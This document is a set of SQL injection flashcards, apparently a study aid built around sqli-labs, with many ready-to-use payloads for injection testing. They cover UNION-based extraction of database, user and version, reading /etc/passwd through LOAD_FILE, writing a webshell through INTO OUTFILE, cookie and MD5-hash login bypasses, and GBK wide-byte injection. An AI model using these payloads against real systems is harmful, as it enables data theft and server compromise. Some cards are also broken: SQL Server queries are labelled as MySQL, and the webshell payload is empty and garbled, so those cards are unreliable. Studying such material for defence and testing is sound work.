SQL Injection Flashcards

1
Q

What is usually appended at the end of an SQL injection payload?

A


%23

2
Q

Where does SQL injection typically appear?

A
POST, GET, Cookie, hash
User-Agent, Client-IP, X-Forwarded-For, Referer
Login pages
Order processing
Search boxes
3
Q

During SQL injection, http://…?id=1 union select 1,2,3,4,5,6 from xxx

displays the numbers, but when user() is put in a displayed position, the user is not shown. How do you resolve this?

A

Most likely an encoding problem.
Method 1, use hex():
id=-1 union select 1,2,hex(concat(database(),0x5c,user(),0x5c,version())),4,5,6 from xxx

Method 2, use convert():
id=-1 union select 1,2,convert(concat(database(),0x5c,user(),0x5c,version()) using latin1),4,5,6 from xxx

4
Q

During SQL injection, http://www.test.com/news.php?id=0' union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23
returns a type error. What do you do?

A

Replace all the numbers with null:
id =1 union select null,null,null,null,null,null,null,null,null,null,null,null,null%23
Then replace the nulls with the corresponding numbers one at a time: if the page returns normally, keep the number; if it errors, change it back to null and move on to the next one (text such as 'a', 'b' can also be used, or a mix of numbers and text).

The final result is
union select null,2,3,null,'a',null,'b',8,null,null,null,null,null%23
This locates which columns are the displayed positions. If GPC (magic quotes) is enabled, the strings can all be replaced with version().

5
Q

During SQL injection, http://www.test.com/news.php?id=12' order by 13%23
displays the page normally and 14 errors, which shows the injection point is string-typed and there are 13 columns.
But with http://www.test.com/news.php?id=0' union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23 the page redirects to http://www.test.com/3 with a 404 error. How do you resolve this?

A

Replace the problematic position with null, e.g.:
http://www.test.com/news.php?id=0' union select 1,2,null,4,5,6,7,8,concat(database(),0x3a,user(),0x3a,version()),10,11,12,13

6
Q

During SQL injection, besides ?id=1 order by, what other method can be used to find the number of columns? Why does this method work?

A

id = union select 1,2,3,4,5

Principle: union select requires the same number of columns on both sides.

7
Q

What does the MID() function do?

A

Extracts a substring.

8
Q

What does the SUBSTR() function do?

A

Extracts a substring.

9
Q

What does CHAR(41) mean?

A

Returns the character corresponding to the ASCII code.

10
Q

What does ASCII(character) mean?

A

Returns the ASCII code corresponding to the character.

11
Q

IF(condition, value1 returned if true, value2 returned if false)

A

This is a review.

12
Q

LENGTH(string)

A

Returns the length of the string.

13
Q

COUNT(column_name)

A

Returns the number of valid (non-null) records in that column.

14
Q

SLEEP(s)

A

Pauses for s seconds; s is numeric and can be chosen freely.

15
Q


/**/

A

Comment.

16
Q

CONCAT(string1, string2, ...)

A

Concatenation.

17
Q

LOAD_FILE(filename)

A

Loads a file so that a file on the server can be read through the web page.
(Use / as the path separator, including on Windows.)
e.g. union select 1,2,3,load_file('F:/VHOST/test/1.txt')

18
Q

INTO OUTFILE 'filename'

A

Writes to a file, e.g. union select 1,2,3,version() into outfile('F:/VHOST/test/1.txt')

19
Q

Besides and 1=1 / and 1=2 (an error from arbitrary characters after the parameter indicates a vulnerability), can and exists(select * from user) also indicate a vulnerability?

A

Yes.

A normal page means the user table exists; an error means it does not.

20
Q

Use union select to read the file /etc/passwd

A

?id=1 union all select LOAD_FILE('/etc/passwd')--

21
Q

Use union select to write a simple webshell (contents: )

A

?id=1 UNION SELECT ‘’’’ INTO OUTFILE ‘‘/var/www/shell.php’’ –

22
Q

What is the SQL Server administrator user?
What are the MySQL user names?
What are the Oracle user names?

A

SQL Server: sa
MySQL: root, anonymous
Oracle: SYS SYSTEM DBSNMP OUTLN

23
Q

Where is MySQL's metadata?

A

INFORMATION_SCHEMA

24
Q

What Oracle metadata views are there?

A

ALL_TABLES
ALL_TAB_COLUMNS
Views starting with USER_ and DBA_

25
Q

Oracle (list all tables accessible to the current user):

A

SELECT OWNER,TABLE_NAME FROM ALL_TABLES ORDER BY TABLE_NAME;

26
Q

MySQL (all tables and databases accessible to the current user)

A

SELECT table_schema,table_name FROM information_schema.tables;

27
Q

MySQL (list all accessible tables using system tables)

A

SELECT name FROM sysobjects WHERE xtype='U';

28
Q

MySQL (list all accessible tables using catalog views)

A

SELECT name FROM sys.tables;

29
Q

What are the database operation types?

A

Create, delete, update, read (CRUD):

INSERT DELETE UPDATE SELECT

30
Q

How is hash injection done?

A
http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid=1&pwd=ffifdyop
# the MD5 hash of ffifdyop contains 'or'
31
Q

How is cookie injection done?

A

Add ;id=1' to the cookie and see whether it errors.
Basic query: order by 3 succeeds, 4 errors.

Table names: UNION SELECT 1,table_name,3 from information_schema.tables where table_schema=database()

Column names: UNION SELECT 1,column_name,3 from information_schema.columns where table_name=0x7361655f757365725f73716c6938

32
Q

http://localhost/sqli-labs/Less-1/?id=1

How do you probe for the vulnerability?

A
'
"
%27
" / %22
; / %3B
%%2727
%25%27
`+HERP
'||'DERP
'+'herp
' ' DERP
If an exception is triggered, the vulnerability is present; if there is no reaction, try %c0 wide-byte injection.
33
Q

http://localhost/sqli-labs/Less-1/?id=1 and 1=1 # page normal
http://localhost/sqli-labs/Less-1/?id=1 and 1=2 # error

A

Then a numeric injection exists.

34
Q

http://localhost/sqli-labs/Less-1/?id=1 and 1=2 # normal
http://localhost/sqli-labs/Less-1/?id=1' and '1'='2 # no output
What does this show?

A

This is a string-typed SQL injection; single quotes and and are not filtered.

35
Q

http://localhost/sqli-labs/Less-1/?id=1

With a GB-series encoding (GBxxxx) or GBK, adding a single quote gets no reaction. What do you do?

A

Try the wide byte %c0:

http://localhost/sqli-labs/Less-1/?id=1%c0' or 1=1 limit 2,1%23